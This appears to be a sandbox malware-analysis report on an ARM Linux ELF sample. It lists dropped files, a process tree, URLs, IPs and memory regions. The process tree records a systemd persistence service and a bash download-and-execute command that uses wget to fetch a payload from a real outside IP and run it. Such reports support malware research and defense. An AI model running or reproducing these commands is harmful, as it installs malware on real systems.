Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
5.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
|
initial sample
|
||
/tmp/5
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
|
dropped
|
||
/etc/systemd/system/hello.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/5.elf
|
/tmp/5.elf
|
||
/tmp/5.elf
|
-
|
||
/bin/sh
|
sh -c "systemctl daemon-reload > /dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl daemon-reload
|
||
/tmp/5.elf
|
-
|
||
/bin/sh
|
sh -c "systemctl start hello.service > /dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl start hello.service
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray
"Notification Area" "Area where notification icons appear"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921
statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8
12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9
12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness
of your display"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so
10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925
actions "Action Buttons" "Log out, lock or other system actions"
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/systemd/systemd
|
-
|
||
/bin/bash
|
/bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
|
||
/bin/bash
|
-
|
||
/usr/bin/sleep
|
sleep 10
|
||
/bin/bash
|
-
|
||
/usr/bin/rm
|
rm -rf /tmp/5
|
||
/bin/bash
|
-
|
||
/usr/bin/wget
|
wget http://103.136.41.100/5 -O /tmp/5
|
||
/bin/bash
|
-
|
||
/usr/bin/chmod
|
chmod 777 /tmp/5
|
||
/bin/bash
|
-
|
||
/tmp/5
|
/tmp/5 .p1
|
There are 25 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://%d.%d.%d.%d/%s
|
unknown
|
||
http://1/wget.sh
|
unknown
|
||
http://103.136.41.100/5
|
103.136.41.100
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://9/curl.sh
|
unknown
|
||
http://%d.%d.%d.%d/2;
|
unknown
|
||
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
daisy.ubuntu.com
|
162.213.35.25
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
103.136.41.100
|
unknown
|
India
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7f3acc749000
|
page read and write
|
|||
7ffee2923000
|
page execute read
|
|||
55d3985cc000
|
page execute and read and write
|
|||
7fa655e9f000
|
page read and write
|
|||
7f39c402d000
|
page execute read
|
|||
5579a1208000
|
page read and write
|
|||
7ffc8cdd7000
|
page read and write
|
|||
5579a320f000
|
page execute and read and write
|
|||
7fa655fec000
|
page read and write
|
|||
7fa6556e2000
|
page read and write
|
|||
7f3acbeaf000
|
page read and write
|
|||
5579a1211000
|
page read and write
|
|||
7f3acd087000
|
page read and write
|
|||
55d3965ce000
|
page read and write
|
|||
5579a0fb7000
|
page execute read
|
|||
7fa55003a000
|
page read and write
|
|||
7f3acc6b7000
|
page read and write
|
|||
55d3965c5000
|
page read and write
|
|||
7fa550036000
|
page read and write
|
|||
7f3acd268000
|
page read and write
|
|||
7fa6552ee000
|
page read and write
|
|||
7fa64ffff000
|
page read and write
|
|||
5579a3226000
|
page read and write
|
|||
7fa655cbe000
|
page read and write
|
|||
7f3accd16000
|
page read and write
|
|||
7f3accea5000
|
page read and write
|
|||
7f39c4036000
|
page read and write
|
|||
7fa655380000
|
page read and write
|
|||
7f3accd39000
|
page read and write
|
|||
7f3ac4021000
|
page read and write
|
|||
7f3ac3fff000
|
page read and write
|
|||
7fa654ae6000
|
page read and write
|
|||
7f3accaab000
|
page read and write
|
|||
7fa55002d000
|
page execute read
|
|||
55d3985e3000
|
page read and write
|
|||
7fa655970000
|
page read and write
|
|||
7fa656031000
|
page read and write
|
|||
7ffee2860000
|
page read and write
|
|||
5579a3e40000
|
page read and write
|
|||
7fa65594d000
|
page read and write
|
|||
55d396374000
|
page execute read
|
|||
7f3acd3fa000
|
page read and write
|
|||
7fa650021000
|
page read and write
|
|||
7fa655adc000
|
page read and write
|
|||
7ffc8cddb000
|
page execute read
|
|||
7f3acd391000
|
page read and write
|
|||
7f39c403a000
|
page read and write
|
|||
7fa655fc8000
|
page read and write
|
|||
7f3acd3b5000
|
page read and write
|